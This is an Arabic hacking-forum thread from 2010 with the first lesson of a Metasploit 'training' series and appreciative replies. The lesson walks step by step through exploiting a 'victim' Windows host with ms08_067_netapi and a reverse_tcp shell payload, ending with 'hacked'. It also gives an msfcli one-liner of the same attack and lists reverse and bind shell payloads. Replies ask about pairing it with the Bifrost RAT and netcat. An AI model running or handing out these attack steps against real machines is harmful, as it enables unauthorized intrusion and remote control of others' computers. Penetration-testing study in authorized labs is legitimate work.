module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)

data$hack · 02-03-2010, 01:48 AM

السلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم

في هذا الدرس :
ستتعرف msfconsole واوامره , كيفية العمل به
ستتعرف msfcli
ستتعرف msfgui
ستتعرف msfweb

مشروع Metasploit مشروع كبير جدا و مشهور عالميا ، بدايته كانت سنة 2003 , كان يحتوي على القليل من exploits و payloads , فبدأت عملية التطور ليصل اليوم محملا ب 496 exploits و 192 payloads و 239 auxiliary. بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow ... و الكثير الكثير

سنتحدث اكثر عن msfconsole
تعريف صغير عن البقية

-----------------------
msfconsole
-----------------------
تجدونها على باك تراك هنا :

كود PHP:

  pentest/exploits/framework3/msfconsole

ندخل الان في الاوامر :
اهم امر help
لن اشرحو هههه

امر show :

show exploits
اظهار جميع الثغرات

show payloads
اظهار جميع payload

show auxiliary
اظهار جميع auxiliary

search
للبحث ;مثال :

امر info
تعطينا معلومات ;مثال :

امر use
احنا عندنا ثغرة نريد استخدامها ،
اذا use ;مثال :

كود PHP:

  msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

اكتب show options لترى options الثغرة ;مثال :

ماذا يهمنا هنا ???
الظحية rhost
rport البورت المصاب اتركه كما هو
نظع ip الظحية set RHOST ip ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2

الان نأتي الى المهم ال payload
باختصار هو كيفية التحكم بجهاز victim
اكتب show payloads من ثم اختر واحدا
باختصار هذه ال payload هي الاقوى :

كود PHP:

  windows/shell/reverse_tcp
windows/shell/bind_tcp
windows/vncinject/bind_tcp
windows/meterpreter/reverse_tcp

سنأتي على تعريفها في الدروس القادمة

نظع ال set payload :::payload ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

اكتب show options لترى options الثغرة again ;مثال :

هههه كبرت
شوف lhost تظع هنا ال ip تبعك ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

كل شيء تمام

الان اكتب exploit للاستغلال ;مثال :

:icon555: :00001793[1]:

تم الاخترق

ملا حظة هامة جدا
انا استعملت ثغرة windows/smb/ms08_067_netapi
يعني انت ممكن تمشي معاك ممكن لا
استعمل ما تعلمته قبل قليل للبحث عن ثغرة تعمل
ان شاء الله استفدتوووا

-----------------------
msfcli
-----------------------

باختصار هيا للاختصار
مثال :

كود PHP:

  /pentest/exploits/framework3/msfcli windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.2 LHOST=192.168.1.2 E

-----------------------
msfgui
-----------------------
للاغبياء فقط :icon666:
تشغيلها سهل :

كود PHP:

  pentest/exploits/framework3/msfgui

-----------------------
msfweb
-----------------------
الاجمل و الاروع :666:
تشغيلها سهل :

كود PHP:

  pentest/exploits/framework3/msfweb

ثم اذهب للمتصفح :

كود PHP:

  http://127.0.0.1:55555/

ان شاء الله اكون وصلت بعض المعلومات و لو القليل
ان شاء الله بتفهم اكثر مع الدروس القادمة
ارجوا من اصحاب القلوب المريضة حفض الحقوق والله تعبت عليه
best regards
data$hack

المصدر: :: vBspiders Professional Network ::

module 1 : lhid msfconsole(METASPLOIT TRANNING)

marrak · 02-03-2010, 10:14 PM

بارك الله فيك اخي الكريم
ولي الشرف ان انظم الى دورتك

serial keller · 02-03-2010, 11:47 PM

[gdwl]thx bro !!!! we waiit for the rest [/gdwl]

data$hack · 02-04-2010, 01:24 PM

شكرا على المرور

الشبح المرح · 02-04-2010, 08:57 PM

روووووعة جدا

عندي سؤال و راح اكثر عليك الاسئلة هههههههههه

في ثغرة windows/smb/ms08_067_netapi

ممكن ابدل البورت من 445 الى 81 بيرفوست

و اكون عامل تنصت بالبيرفوست و صيصلني التبيليغ اليس كذالك

ام اني على خطأ

data$hack · 02-04-2010, 09:27 PM

اهلا بيك اخي الشبح المرح ;;;
لا يمكن تغيير بورت الثغرة اخي لانه البورت الافتراضي للبرنامج
اخي هذه ثغرة buffer لا يمكن تتنصت عليها بال bifrost هي مو سرفر
هذا حد فهمي لسؤالك
اهلا بيك اخي

الشبح المرح · 02-04-2010, 10:23 PM

ادا لا يوجد الا نت كات

بارك الله فيك على تصحيح الامور

data$hack · 02-05-2010, 02:39 PM

هذا واجب اخي

Cyber Code · 02-08-2010, 05:29 PM

مشكور حبيبي واصل وإلا الامام

data$hack · 02-08-2010, 07:38 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Dark Light


	مشكور حبيبي واصل وإلا الامام

منور الموضوع و شكرا على الرد :Great:

kyokar · 02-09-2010, 11:02 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

blablabou94 · 02-11-2010, 11:49 PM

شكرا أخي لقد ساعدتني كثيرة على فهمي هذا الموظ3 أنت لمعالم والله
أنتظر الباقي أرجوك

blablabou94 · 02-12-2010, 11:48 PM

سؤال هااام والله هل خطير لو أستعمله ضد حاسوبي أرجوك أنتظر الإجابة//... أي أن حاسوبي هو الضحية

powerful virus · 02-27-2010, 12:20 PM

بصراحة لي الشرف اني انظم الى دورتك

Governmen7 · 03-01-2010, 11:02 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . موفق بإذن الله ... لك مني أجمل تحية .

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
::: METASPLOIT TRANNING ::: مقدمة , توضيحات و فهرس	data$hack	MetaSploit	212	04-26-2015 11:09 PM
[اول درس]نبذة عن الميتاسبلويت	المجهووول	MetaSploit	28	03-22-2012 01:09 AM
module 4 : ال [METERPRETER]. =>>>>>> الدرس 1 : نبذة عن الاوامر	data$hack	MetaSploit	100	01-29-2011 11:45 PM
شرح أداة الـ msfcli داخل الميتاسبلويت عوضا عن الكونسول والواجهة الرسومية	MATRIX ALGERIA	جـــ'ابات العناكــ'ب	6	04-28-2010 08:28 PM

module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)

MetaSploit